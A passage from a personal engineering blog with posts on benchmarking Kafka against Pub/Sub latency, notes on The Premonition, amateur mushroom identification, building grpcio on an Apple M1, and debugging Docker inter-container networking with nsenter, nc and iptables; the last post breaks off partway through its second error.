David Xia

Benchmarking Kafka and Google Cloud Pub/Sub Latencies

2021-08-18T09:22:47-04:00

I’m helping a recently acquired team at work figure out if they can migrate from Kafka to Google Cloud Pub/Sub. Part of the exploration was figuring out the change in latencies, if any, from switching.

The team’s production setup is like this.

They paid an external company called Confluent to run a managed Kafka cluster in AWS Oregon.
This is the same region where this team ran all their backend services. Part of their migration also involves switching their workloads from AWS Oregon to GCP us-central1. If they choose to migrate to Pub/Sub, their services will be publishing and subscribing to messages across cloud providers and regions. So my latency benchmarks took that into account.
All their services are written in Golang.
Services run as containers in AWS Elastic Container Service.

I defined latency as the time elapsed from when a message is published and when it’s received by a subscriber. I didn’t count the extra time it takes for a subscriber to acknowledge the message. I used Golang and the same upstream libraries for Kafka and Pub/Sub that they used or would use, respectively, in production. I published messages of various sizes at various rates from AWS EC2 instances in Oregon for five minutes. At the same time, five Google Compute Engine instances in us-central1 subscribed to these messages (pull-based) as fast as possible with an initial burn-in period of one minute. I didn’t measure the latency until the burn-in period elapsed to avoid any effects on latency that may arise from using a new topic or subscription or not enough messages flowing through the messaging service. This ensured I more closely mimicked message latency in production. I always took the percentile summary of the subscriber with the second highest p99 latency. I created new Pub/Sub or Kafka topics for each series in the graphs below. Kafka topics always had eight partitions.

I took some inspiration from a blog post titled “Benchmarking Message Queue Latency” and also found the following GCP post “Testing Cloud Pub/Sub clients to maximize streaming performance.” The latter linked to the code used to benchmark Pub/Sub. Unfortunately, after trying that tool many times and finding it wasn’t documented well or had various issues like this, I gave up and wrote my own simple latency benchmarker in Golang. This was probably better anyways to ensure I was using the same language and client libraries as the team I was helping.

My full results are in this Google sheet. The benchmarking code is at github.com/davidxia/cloud-message-latency.

Pub/Sub Latencies

Kafka Latencies

Summary

With my specific test parameters, Kafka p99 latencies are 100-200ms and much lower than Pub/Sub latencies. In the worst case scenarios, Pub/Sub latencies were almost an order of magnitude higher. Pub/Sub p99 latencies were approximately 0.5-1 seconds at the team’s current publisher throughput which is relatively low at about 1KB/s. At higher throughputs the latencies dropped to 300-400ms. This conforms to Google’s documentation and generally accepted knowledge that Pub/Sub performs faster at higher message volumes. According to one of that team’s engineers, this latency is acceptable for all messages except for one which can be changed to a direct service-to-service request.

It was also interesting to see that message delivery was pretty evenly spread out over five subscribers with Pub/Sub. Kafka often had a few consumers that received twice as many messages as their peers.

After I finished benchmarking, I found PerfKitBenchmarker, an open source benchmarking tool used to measure and compare cloud offerings. It looks promising, but I haven’t tried it out yet.

Notes on Michael Lewis' the Premonition

2021-08-16T11:18:41-04:00

Last week I finished reading Michael Lewis’ The Premonition. The following parts of the book (with page numbers) stood out to me.

The U.S. Centers for Disease Control (CDC) is portrayed as a risk-averse bureaucracy that wants to study disease and not take strong measures to control disease. Sometimes this interest conflicts with local health officials who want to save lives and see strong measures as necessary even if not all the evidence is available yet. Health officials are always firefighting and can’t wait for more data. Lewis compared them to platoon leaders during battle. (page 40)

Deadly mistakes are often result from the combination of systemic and human failures. Lewis tells the story of a Veterans Affairs (VA) patient who was accidentally boiled alive in an Atlanta VA hospital. The hospital heated water to a specific temperature hot enough to kill certain bacteria but not hot enough to scald people. Bathtub faucets had a special valve that prevented water that was too hot from emerging. The water heating mechanism was broken, however. So the nurses compensated by adjusting the valve to a hotter temperature. Then one day, plumbers fixed the heating mechanism without telling the nurses. Normally a patient would tell the nurses when the water was too hot. But the nurses happened to be bathing one patient who was an older man with mental health problems. He always screamed no matter what. The nurses didn’t think anything was wrong when he screamed this time. “An hour later, the man’s skin was peeling away, and he was dying of thermal burns.” (67) This is a powerful story. Unfortunately, I’m unable to find corroborating news articles, and Lewis doesn’t have references or footnotes.

Why and how people learn.

…people don’t learn what is imposed upon them but rather what they frely seek, out of desire or
need. For people to learn, they need to want to learn… “People in an organization learn,” said
Carter. “They’re learning all kinds of things. But they aren’t learning what you are teaching them.
You go to a formal meeting. The important conversation is not in the meeting. It’s in the halls
during the breaks. And usually what’s important is taboo. And you can’t say it in the formal
meeting.”
72-3

Is Lewis’ account of the CDC’s aversion to computer models accurate? Premonition says the CDC had models that were just in people’s heads. “They, too, used models. They, too, depended on abstractions to inform their judgments. Those abstractions just happened to be inside their heads.” (85)

One of the two main protagonists of the book is an American physician named Carter Mecher. From 1996 to 2005, Mecher served as the Chief Medical Officer for the Southeast Veterans Administration Network. Mecher wanted to figure out how government should allocate resources.

Each year, Congress would hand more than a hundred billion dollars to Veterans Affairs, and various
people inside the VA would bay for more than they’d gotten the year before. The top brass had no way
to figure out who was actually busting their ass and needed more help and who was loafing…He hated
in particular the way some people were able to use their own inefficiency to create a seeming need
for more funding; and other people, people with a gift for making do with less, were, as a result,
given even less. “It drove out the entrepreneurial spirit,” said Carter.
162

ICE under the Trump administration was bussing and flying undocumented immigrants into cities in California to manufacture a humanitarian crisis according to the other protagonist of the book, a public health official named Charity Dean. (187, 190) This seemed insane to me, but I was able to find news articles about this. The actual story seems a bit more nuanced as one can read from this AP article “Far from border, US cities feel effect of migrant releases.”

Charity Dean explained to the CDC at the beginning of 2020 that there is no “system of public health in the United States, just a patchwork of state and local health officers, beholden to a greater or lesser degree to local elected officials. Three thousand five hundred separate entities that had been starved of resources for the past forty years.” This explains why the U.S. had no coordinated and science-based approach to Covid. (205-6)

A major antagonist of the book is Sonia Angell. She was the director of California’s Public Health Department and supervisor to Charity Dean who was the deputy director at the time. Lewis describes how she actively prevented any measures to acknowledge the severity of the virus or to try to contain it. Did Lewis try to interview and incorporate Sonia Angell’s side of the story?

A particularly egregious story of CDC incompetence is when they didn’t bother recording the addresses of Americans returning from China.

When local health officers called the CDC to say how hard it was to track down John Smith when the
CDC had listed his residence as “Los Angeles International Airport,” the CDC said, “Just don’t
follow up on them.” What was the point of having these travel restrictions from Wuhan if the federal
government was going to just let people loose upon their return?
206

There’s a particularly enraging and scary part of the book on CDC inaction. Mecher learns about Covid transmission, hospitalization, and death reates among passengers on the Diamond Princess cruise ship. This is a perfect and scary real life simulation of how Covid will behave in the general population. Mecher compares the situation of the world at the time to the Mann Gulch fire. This was a wildfire that initially looked containable. 13 smokejumpers parachuted in to fight it. But then “unexpected high winds caused the fire to suddenly expand, cutting off the men’s route and forcing them back uphill. During the next few minutes, a “blow-up” of the fire covered 3,000 acres (1,200 ha) in ten minutes, claiming the lives of 13 firefighters, including 12 of the smokejumpers. Only three of the smokejumpers survived.“ Mecher tries desparately to convince the CDC to take strong enough actions.

“I sense confusion among very smart people,” he wrote in early March. “[They] hear that more than
80% of those who are infected have mild disease and that overall case fatality rates are on the
order of .5%. And then they equate these states to a mild outbreak.” … Using the most conservative
assumptions suggested by the cruise ship—an attack rate of 20 percent and a fatality rate of
half of 1 percent—you wound up with 330,000 dead Americans… “You have all been quiet for
most of the discussion over the past several weeks. I would urge you to read the article I just sent
out and upbrief your boss… History will long remember what we do and what we don’t do at this
critical moment. It is time to act and it is past the time to remain silent. This outbreak isn’t
going to magically disappear on its own.”
214-8

It’s obvious that people at the top of government agencies at all levels are lost. No one’s coming to save us. Here’s another enraging anecdote about Angell.

On March 6, Gavin Newsome convened a hundred of the state’s top officials to discuss the new
coronavirus. Sonia Angell had told Charity that she, Angell, would give the briefing to the
governor, and that it was better if Charity did not attend the meeting. *You have no role*, Angell
explained, *so you should not be there*. Charity didn’t believe Angell had the ability to get up in
front of the audience and explain what was going on. “I just had a feeling that something would
happen and she wouldn’t be able to make it,” she recalled. Sure enough, the morning of the event,
the phone call came. Angell couldn’t make the meeting. Might Charity step in at the last minute to
replace her?
226

Media changes now force technical people to consider the cynical perception of their actions instead of strictly whether their decision in and of itself is the best. (287)

Lewis introduces the interesting concept of L6.

In any large organization, the solution to any crisis was usually found not in the officially
important people at the top but in some obscure employee far down the organization’s chart. A case
in point was the day the software used by the State Department to process visa applications stopped
working. That day the U.S. government simply lost its ability to issue visas… “Six layers down
from the people in charge we found two contractors who actually understand what is broken.” The L6.
231

The private sector is inefficient at generating knowledge because profit motive prevents collaboration and openness. (246)

Another story about how the federal government’s laissez-faire attitude towards helping state and local governments secure personal protective equipment led to a market free-for-all that drove prices way up. (253)

Local health offices are understaffed and behind the times. Joseph DeRisi is an American biochemist who heads the Chan Zuckerberg Biohub, a nonprofit research organization. In April 2020, Biohub had developed a Covid test kit and offered it free to any local public health officials who needed it.

Once his team began to deliver free test kits to them, he understood why they’d been slow to take up
the Biohub’s offer of free testing. Many local health officers were so understaffed and
underequipped they had trouble using the test kits. Most were unable to receive the results
electronically; they needed the results faxed to them. Some had fax machines so old that they
couldn’t receive more than six pages at a time. A few didn’t even have functioning fax machines, and
so the Biohub got into the business of buying and delivering fax machines along with test kits.
254

This story is corroborated by this NYT article “Bottleneck for U.S. Coronavirus Response: The Fax Machine.”

One reason why the CDC is dysfunctional is because Reagan changed its director from being a civil servant to a presidential appointee. (289-90)

Local health officials who were courageous lost their jobs and feared for their safety because there was a lack of leadership from CDC and federal and state leaders. (291)

Mushroom Foraging in Waltham

2021-08-07T11:53:58-04:00

I collected mushrooms this morning with Gloria and my parents. It rained a lot last week in Waltham, MA. Many mushrooms had sprung up in Prospect Hill Park nearby. The temperature forecast for today said the highs would be 32°C. So I wanted to go out in the morning while it was not too hot. Over the objections of my mother, Gloria, my father, and I picked different mushrooms and carried them back to the car. Next time we’ll bring a basket and a trowel. I took them back only to identify them. I am definitely neither experienced nor confident enough to eat any wild mushrooms I find.

Do not use this post as any basis for consuming mushrooms yourself. Some mushrooms are extremely poisonous and can be fatal if ingested.

Here’s photos of what we found and my amateur guess at what they are.

Russula cremoricolor (Creamy Russula)

Russula brevipes (Short-Stemmed Russula)

Russula albonigra

Amanita bisporigera (Destroying angel)

some type of Grisette

Boletus pseudosensibilis

We saw what I think is a Boletus pseudosensibilis, but my mom snatched it out of my hands and threw it away before I could take it home.

Monotropa uniflora (Ghost pipe)

Monotropa uniflora isn’t a fungus but needs them. It has no chlorophyll and doesn’t depend on photosynthesis. It’s a saprophyte that gets nutrients by tapping into the resources of trees, indirectly through myccorhizal fungi.

How to Install Grpcio Pip Package on Apple M1

2021-05-08T22:42:53-07:00

I spent a long time figuring out how to install the latest grpcio Pip package (version 1.37.1) on my Apple M1 Macbook.

pip install grpcio

Looking in indexes: https://pypi.org/simple, https://artifactory.spotify.net/artifactory/api/pypi/pypi/simple
Collecting grpcio
  Downloading https://artifactory.spotify.net/artifactory/api/pypi/pypi/packages/packages/a0/d6/d04c6550debe23e2eaef0d9c4adccbb6e20d8cce6da40ae989fe8836e287/grpcio-1.37.1.tar.gz (21.7 MB)
     |████████████████████████████████| 21.7 MB 143 kB/s
Requirement already satisfied: six>=1.5.2 in ./.virtualenvs/spotify/lib/python3.9/site-packages (from grpcio) (1.12.0)
Building wheels for collected packages: grpcio
  Building wheel for grpcio (setup.py) ... error
  ERROR: Command errored out with exit status 1:
...

  third_party/zlib/gzlib.c:252:9: error: implicit declaration of function 'lseek' is invalid in C99 [-Werror,-Wimplicit-function-declaration]
          LSEEK(state->fd, 0, SEEK_END);  /* so gzoffset() is correct */
          ^
  third_party/zlib/gzlib.c:14:17: note: expanded from macro 'LSEEK'
  #  define LSEEK lseek
                  ^
  third_party/zlib/gzlib.c:252:9: note: did you mean 'fseek'?
  third_party/zlib/gzlib.c:14:17: note: expanded from macro 'LSEEK'
  #  define LSEEK lseek
                  ^
  /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/include/stdio.h:162:6: note: 'fseek' declared here
  int      fseek(FILE *, long, int);
           ^
  third_party/zlib/gzlib.c:258:24: error: implicit declaration of function 'lseek' is invalid in C99 [-Werror,-Wimplicit-function-declaration]
          state->start = LSEEK(state->fd, 0, SEEK_CUR);
                         ^
  third_party/zlib/gzlib.c:14:17: note: expanded from macro 'LSEEK'
  #  define LSEEK lseek
                  ^
  third_party/zlib/gzlib.c:359:9: error: implicit declaration of function 'lseek' is invalid in C99 [-Werror,-Wimplicit-function-declaration]
      if (LSEEK(state->fd, state->start, SEEK_SET) == -1)
          ^
  third_party/zlib/gzlib.c:14:17: note: expanded from macro 'LSEEK'
  #  define LSEEK lseek
                  ^
  third_party/zlib/gzlib.c:400:15: error: implicit declaration of function 'lseek' is invalid in C99 [-Werror,-Wimplicit-function-declaration]
          ret = LSEEK(state->fd, offset - state->x.have, SEEK_CUR);
                ^
  third_party/zlib/gzlib.c:14:17: note: expanded from macro 'LSEEK'
  #  define LSEEK lseek
                  ^
  third_party/zlib/gzlib.c:496:14: error: implicit declaration of function 'lseek' is invalid in C99 [-Werror,-Wimplicit-function-declaration]
      offset = LSEEK(state->fd, 0, SEEK_CUR);
               ^
  third_party/zlib/gzlib.c:14:17: note: expanded from macro 'LSEEK'
  #  define LSEEK lseek
                  ^
  5 errors generated.

...

  clang -Wno-unused-result -Wsign-compare -Wunreachable-code -DNDEBUG -g -fwrapv -O3 -Wall -I/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/include -I/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/include -I/Users/dxia/.virtualenvs/spotify/include -I/Users/dxia/.pyenv/versions/3.9.1/include/python3.9 -c /var/folders/x1/f9sjnv7j43z73sdv5lsk3r8h0000gp/T/tmpyvic7ha6/a.c -o None/var/folders/x1/f9sjnv7j43z73sdv5lsk3r8h0000gp/T/tmpyvic7ha6/a.o
  Traceback (most recent call last):
    File "/Users/dxia/.pyenv/versions/3.9.1/lib/python3.9/distutils/unixccompiler.py", line 117, in _compile
      self.spawn(compiler_so + cc_args + [src, '-o', obj] +
    File "/private/var/folders/x1/f9sjnv7j43z73sdv5lsk3r8h0000gp/T/pip-install-1ha5py6y/grpcio_12658497b5464faa852de046ce91485a/src/python/grpcio/_spawn_patch.py", line 54, in _commandfile_spawn
      _classic_spawn(self, command)
    File "/Users/dxia/.pyenv/versions/3.9.1/lib/python3.9/distutils/ccompiler.py", line 910, in spawn
      spawn(cmd, dry_run=self.dry_run)
    File "/Users/dxia/.pyenv/versions/3.9.1/lib/python3.9/distutils/spawn.py", line 87, in spawn
      raise DistutilsExecError(
  distutils.errors.DistutilsExecError: command '/usr/bin/clang' failed with exit code 1

...

    ----------------------------------------
ERROR: Command errored out with exit status 1: /Users/dxia/.virtualenvs/spotify/bin/python -u -c 'import io, os, sys, setuptools, tokenize; sys.argv[0] = '"'"'/private/var/folders/x1/f9sjnv7j43z73sdv5lsk3r8h0000gp/T/pip-install-1ha5py6y/grpcio_12658497b5464faa852de046ce91485a/setup.py'"'"'; __file__='"'"'/private/var/folders/x1/f9sjnv7j43z73sdv5lsk3r8h0000gp/T/pip-install-1ha5py6y/grpcio_12658497b5464faa852de046ce91485a/setup.py'"'"';f = getattr(tokenize, '"'"'open'"'"', open)(__file__) if os.path.exists(__file__) else io.StringIO('"'"'from setuptools import setup; setup()'"'"');code = f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' install --record /private/var/folders/x1/f9sjnv7j43z73sdv5lsk3r8h0000gp/T/pip-record-n4ihfdh1/install-record.txt --single-version-externally-managed --compile --install-headers /Users/dxia/.virtualenvs/spotify/include/site/python3.9/grpcio Check the logs for full command output.

Fixed by setting the following (I use fish shell). I found the first four environment variables in this Github comment. The second two I knew to add because I was seeing errors about the compiler not being able to find the openssl.h and re.h header files.

set -x GRPC_BUILD_WITH_BORING_SSL_ASM ""
set -x GRPC_PYTHON_BUILD_SYSTEM_RE2 true
set -x GRPC_PYTHON_BUILD_SYSTEM_OPENSSL true
set -x GRPC_PYTHON_BUILD_SYSTEM_ZLIB true
set -x CPPFLAGS "-I"(brew --prefix openssl)"/include -I"(brew --prefix re2)"/include"
set -x LDFLAGS "-L"(brew --prefix openssl)"/lib -L"(brew --prefix re2)"/lib"

What I Recently Learned About Docker Networking and Debugging Networking Issues in General

2021-05-02T16:39:02-07:00

This is a story about how debugged a confounding local development environment issue, what I learned about Docker in the process, and the generally applicable debugging strategies and techniques that helped me ultimately solve it. Skip to the end if you only want to read the debugging strategies and techniques. The overall story, however, will illustrate how they applied in this specific case.

Problem Statement and Use Case

A data infrastructure team at work provides a tool for starting a data pipeline job from a local development environment. Let’s call this tool foo. This tool depends on gcloud and docker. It creates a user-defined Docker network, runs a utility container called bar connected to that network, and then runs another container called qux that talks to bar to retrieve Oauth tokens from Google Cloud Platform (GCP).

Most developers run foo on their local workstations, e.g. Macbooks. But I have the newer Macbook with the Apple M1 ARM-based chip. Docker Desktop on Mac support for M1s was relatively recent. I didn’t want deal with Docker weirdness. I also didn’t have a lot of free disk space on my 256GB Macbook and thus didn’t feel like clogging up my drive with lots of Java, Scala, and Docker gunk.

So I tried running foo on a GCE VM configured by our Puppet configuration files. I ran foo, I got this error.

Error #1: inter-container networking failed between containers attached to user-defined Docker networks

dxia@my-host$ foo --verbose run -f data-info.yaml -w DumpKubernetesContainerImagesJob -p 2021-04-26 -r my-project/target/image-name
DEBUG:verify: Docker network `foo-network` already exists
DEBUG:verify: bar container found.
INFO:run: starting workflow DumpKubernetesContainerImagesJob ...
ERROR: (gcloud.auth.activate-service-account) [Errno 110] Connection timed out
This may be due to network connectivity issues. Please check your network settings, and the status of the service you are trying to reach.
Traceback (most recent call last):
  File "/usr/local/bin/activate-google-application-credentials", line 19, in 
    'auth', 'activate-service-account', '--key-file', json_path])
  File "/usr/lib/python3.6/subprocess.py", line 311, in check_call
    raise CalledProcessError(retcode, cmd)
subprocess.CalledProcessError: Command '['gcloud', 'auth', 'activate-service-account', '--key-file', '/etc/_foo/gcp-sa-key.json']' returned non-zero exit status 1.
ERROR:foo:

  RAN: /usr/bin/docker run -it -v /home/dxia/my-project/_foo:/etc/_foo:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python2.7/dist-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.6/dist-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.7/dist-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.8/dist-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.9/dist-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python2.7/site-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.6/site-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.7/site-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.8/site-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.9/site-packages/oauth2client/__init__.py:ro --net foo-network -e FOO_COMPONENT_ID=my-project -e FOO_WORKFLOW_ID=DumpKubernetesContainerImagesJob -e FOO_PARAMETER=2021-04-26 -e FOO_DOCKER_IMAGE=my-project:20210426T211411-2b5452d -e 'FOO_DOCKER_ARGS=wrap-luigi --module luigi_tasks DumpKubernetesContainerImagesJob --when 2021-04-26' -e FOO_EXECUTION_ID=foorun-2e30c385-2f89-494c-bc0e-97b3eff316d5 -e FOO_TRIGGER_ID=foo-942f155b-49eb-4af8-a6e4-3adf6f72577b -e FOO_TRIGGER_TYPE=foo -e FOO_ENVIRONMENT=foo -e FOO_LOGGING=text -e GOOGLE_APPLICATION_CREDENTIALS=/etc/_foo/gcp-sa-key.json -e FOO_SERVICE_ACCOUNT=dump-k8-deployment-info-pipeli@my-project.iam.gserviceaccount.com gcr.io/xpn-1/my-project:20210426T211411-2b5452d wrap-luigi --module luigi_tasks DumpKubernetesContainerImagesJob --when 2021-04-26

  STDOUT:


  STDERR:
Traceback (most recent call last):
  File "/home/dxia/my-project//lib/python3.6/site-packages/foo/foo.py", line 304, in main
    args.func(args)
  File "/home/dxia/my-project//lib/python3.6/site-packages/foo/foo.py", line 269, in _run
    args.declarative_infra,
  File "/home/dxia/my-project//lib/python3.6/site-packages/foo/run.py", line 641, in run_workflow
    declarative_infra,
  File "/home/dxia/my-project//lib/python3.6/site-packages/foo/run.py", line 161, in _run_workflow
    p.wait()
  File "/home/dxia/my-project//lib/python3.6/site-packages/sh.py", line 841, in wait
    self.handle_command_exit_code(exit_code)
  File "/home/dxia/my-project//lib/python3.6/site-packages/sh.py", line 865, in handle_command_exit_code
    raise exc
sh.ErrorReturnCode_1:

  RAN: /usr/bin/docker run -it -v /home/dxia/my-project/_foo:/etc/_foo:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python2.7/dist-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.6/dist-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.7/dist-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.8/dist-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.9/dist-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python2.7/site-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.6/site-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.7/site-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.8/site-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.9/site-packages/oauth2client/__init__.py:ro --net foo-network -e FOO_COMPONENT_ID=my-project -e FOO_WORKFLOW_ID=DumpKubernetesContainerImagesJob -e FOO_PARAMETER=2021-04-26 -e FOO_DOCKER_IMAGE=my-project:20210426T211411-2b5452d -e 'FOO_DOCKER_ARGS=wrap-luigi --module luigi_tasks DumpKubernetesContainerImagesJob --when 2021-04-26' -e FOO_EXECUTION_ID=foorun-2e30c385-2f89-494c-bc0e-97b3eff316d5 -e FOO_TRIGGER_ID=foo-942f155b-49eb-4af8-a6e4-3adf6f72577b -e FOO_TRIGGER_TYPE=foo -e FOO_ENVIRONMENT=foo -e FOO_LOGGING=text -e GOOGLE_APPLICATION_CREDENTIALS=/etc/_foo/gcp-sa-key.json -e FOO_SERVICE_ACCOUNT=dump-k8-deployment-info-pipeli@my-project.iam.gserviceaccount.com gcr.io/xpn-1/my-project:20210426T211411-2b5452d wrap-luigi --module luigi_tasks DumpKubernetesContainerImagesJob --when 2021-04-26

  STDOUT:


  STDERR:

The HTTP connection timed out. First I checked whether the container started by foo can make a TCP connection to the bar container. I ran foo --verbose run -f data-info.yaml -w DumpKubernetesContainerImagesJob -p 2021-04-26 -r my-project/target/image-name again and did the following in another terminal window.

nsenter is a cool tool that allows you to run programs in different Linux namespaces. It’s very useful when you can’t get an executable shell into a container with commands like docker exec -it ... bash. This can happen when the container doesn’t even include any shells and just has the binary executable for instance.

dxia@my-host:~$ docker ps
CONTAINER ID        IMAGE                                                                    COMMAND                  CREATED             STATUS              PORTS                     NAMES
a0e872188831        my-project:20210426T211411-2b5452d         "/usr/local/bin/edge…"   2 seconds ago       Up 1 second                                   relaxed_pike
4dda670a2ee1        foo/bar:latest                                   "./bar"               2 hours ago         Up 2 hours          0.0.0.0:80->80/tcp        bar

dxia@my-host:~$ sudo nsenter -n -t $(docker inspect --format  a0e872188831)  nc 172.20.0.127 80 -nvz -w 5
(UNKNOWN) [172.20.0.127] 80 (http) : Connection timed out

So the HTTP connection timeout was caused by an error lower down on the networking stack: an inability to establish a TCP connection. A TCP connection from the host to bar worked though.

dxia@my-host:~$ nc 172.20.0.127 80 -nvz -w 5
(UNKNOWN) [172.20.0.127] 80 (http) open

When I see a networking issue like this, I know there might be some misconfigured firewall rule blocking IP packets. I listed all the firewall rules. The ones in the filter table’s FORWARD chain caught my attention.

dxia@my-host:~$ sudo iptables --list FORWARD --verbose --numeric --line-numbers --table filter
Chain FORWARD (policy DROP 38 packets, 2280 bytes)
num   pkts bytes target     prot opt in     out     source               destination
   6204  492K DOCKER-USER  all  --  *      *       0.0.0.0/0            0.0.0.0/0
   6204  492K DOCKER-ISOLATION-STAGE-1  all  --  *      *       0.0.0.0/0            0.0.0.0/0
   3080  323K ACCEPT     all  --  *      corp0  0.0.0.0/0            0.0.0.0/0            ctstate RELATED,ESTABLISHED
      1    60 DOCKER     all  --  *      corp0  0.0.0.0/0            0.0.0.0/0
   3085  167K ACCEPT     all  --  corp0 !corp0  0.0.0.0/0            0.0.0.0/0
      0     0 ACCEPT     all  --  corp0 corp0  0.0.0.0/0            0.0.0.0/0
    264 17722 DOCKER     all  --  *      br-8ce7e363e4f9  0.0.0.0/0            0.0.0.0/0
   7382   17M ACCEPT     all  --  br-8ce7e363e4f9 !br-8ce7e363e4f9  0.0.0.0/0            0.0.0.0/0

I disabled the GCE VM’s cronned Puppet run and then ran sudo systemctl restart docker. I ran bar and a test nginx1 container connected to foo-network.

dxia@my-host:~$ docker run --rm -d -v ~/.config/gcloud/:/.config/gcloud --name bar --net foo-network --ip 172.20.0.127 -p 80:80 foo/bar:latest
3f9cc17b3f71e7056fd8072449afa78eb9a6a166ac091d751b69545ead0438b1

dxia@my-host:~$ docker run --net foo-network --name nginx1 -d -p 8080:80 nginx:latest
1b0b2b981f9389a989aa8f60a141b5e9a18ba5582141b6668c9078b6312dcfaf

dxia@my-host:~$ docker ps
CONTAINER ID        IMAGE                                                                    COMMAND                  CREATED              STATUS              PORTS                     NAMES
1b0b2b981f93        nginx:latest                                                             "/docker-entrypoint.…"   5 seconds ago        Up 3 seconds        0.0.0.0:8080->80/tcp      nginx1
3f9cc17b3f71        foo/bar:latest                                   "./bar"               About a minute ago   Up 59 seconds       0.0.0.0:80->80/tcp        bar

Now a TCP connection from the nginx container to bar succeeded.

dxia@my-host:~$ sudo nsenter --net=$(docker inspect --format  nginx1) nc 172.20.0.127 80 -nvz -w 5
(UNKNOWN) [172.20.0.127] 80 (http) open

I checked iptables rules again and saw two additional rules (7 and 8) in the filter table’s FORWARD chain. Rule 8 allowed IP packets coming in from the br-8ce7e363e4f9 network interface (in this case a Linux bridge) and leaving through the same interface.

dxia@my-host:~$ sudo iptables --list FORWARD --verbose --numeric --line-numbers --table filter
Chain FORWARD (policy DROP 0 packets, 0 bytes)
num   pkts bytes target     prot opt in     out     source               destination
      0     0 DOCKER-USER  all  --  *      *       0.0.0.0/0            0.0.0.0/0
      0     0 DOCKER-ISOLATION-STAGE-1  all  --  *      *       0.0.0.0/0            0.0.0.0/0
      0     0 ACCEPT     all  --  *      corp0  0.0.0.0/0            0.0.0.0/0            ctstate RELATED,ESTABLISHED
      0     0 DOCKER     all  --  *      corp0  0.0.0.0/0            0.0.0.0/0
      0     0 ACCEPT     all  --  corp0 !corp0  0.0.0.0/0            0.0.0.0/0
      0     0 ACCEPT     all  --  corp0 corp0  0.0.0.0/0            0.0.0.0/0
      0     0 ACCEPT     all  --  *      br-8ce7e363e4f9  0.0.0.0/0            0.0.0.0/0            ctstate RELATED,ESTABLISHED
      0     0 ACCEPT     all  --  br-8ce7e363e4f9 br-8ce7e363e4f9  0.0.0.0/0            0.0.0.0/0
    264 17722 DOCKER     all  --  *      br-8ce7e363e4f9  0.0.0.0/0            0.0.0.0/0
  7382   17M ACCEPT     all  --  br-8ce7e363e4f9 !br-8ce7e363e4f9  0.0.0.0/0            0.0.0.0/0

When I re-ran Puppet rules 7 and 8 were deleted and containers on the foo-network were again unable to establish a TCP connection. I added rule 8 manually and confirmed this is the rule causing my error above.

dxia@my-host:~$ sudo iptables --table filter --append FORWARD --in-interface br-8ce7e363e4f9 --out-interface br-8ce7e363e4f9 --source 0.0.0.0/0 --destination 0.0.0.0/0 --jump ACCEPT

dxia@my-host:~$ sudo iptables --list FORWARD --verbose --numeric --line-numbers --table filter
Chain FORWARD (policy DROP 0 packets, 0 bytes)
num   pkts bytes target     prot opt in     out     source               destination
1    23526 1377K DOCKER-USER  all  --  *      *       0.0.0.0/0            0.0.0.0/0
2    23526 1377K DOCKER-ISOLATION-STAGE-1  all  --  *      *       0.0.0.0/0            0.0.0.0/0
3    11728  755K ACCEPT     all  --  *      corp0  0.0.0.0/0            0.0.0.0/0            ctstate RELATED,ESTABLISHED
4        1    60 DOCKER     all  --  *      corp0  0.0.0.0/0            0.0.0.0/0
5    11737  617K ACCEPT     all  --  corp0 !corp0  0.0.0.0/0            0.0.0.0/0
6        0     0 ACCEPT     all  --  corp0 corp0  0.0.0.0/0            0.0.0.0/0
7      182 12970 DOCKER     all  --  *      br-8ce7e363e4f9  0.0.0.0/0            0.0.0.0/0
8       39  2748 ACCEPT     all  --  br-8ce7e363e4f9 !br-8ce7e363e4f9  0.0.0.0/0            0.0.0.0/0
9        0     0 ACCEPT     all  --  br-8ce7e363e4f9 br-8ce7e363e4f9  0.0.0.0/0            0.0.0.0/0

dxia@my-host:~$ sudo nsenter --net=$(docker inspect --format  nginx1) nc 172.20.0.127 80 -nvz -w 5
(UNKNOWN) [172.20.0.127] 80 (http) open

Now running foo gave a different error.

Error #2: DNS queries for external records from bar failed

dxia@my-host$ foo run -f data-info.yaml -w DumpKubernetesContainerImagesJob -p 2021-04-26 -r my-project/target/image-name
INFO:run: starting workflow DumpKubernetesContainerImagesJob ...
ERROR: (gcloud.auth.activate-service-account) There was a problem refreshing your current auth tokens: Invalid response 500.
Please run:

  $ gcloud auth login

to obtain new credentials.

If you have already logged in with a different account:

    $ gcloud config set account ACCOUNT

to select an already authenticated account to use.
Traceback (most recent call last):
  File "/usr/local/bin/activate-google-application-credentials", line 19, in 
